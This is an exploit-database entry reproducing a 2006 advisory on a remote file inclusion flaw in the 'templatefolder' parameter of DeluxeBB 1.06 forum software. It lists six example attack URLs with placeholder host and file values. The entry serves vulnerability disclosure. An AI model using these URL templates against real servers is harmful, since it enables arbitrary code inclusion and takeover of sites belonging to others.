DeluxeBB 1.06 - templatefolder Remote File Inclusion

2006-06-15T00:00:00
ID EXPLOITPACK:A15A05575384A46F6AF2655165705498
Type exploitpack
Reporter Andreas Sandblad
Modified 2006-06-15T00:00:00

Description

DeluxeBB 1.06 - templatefolder Remote File Inclusion

                                        
                                            Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]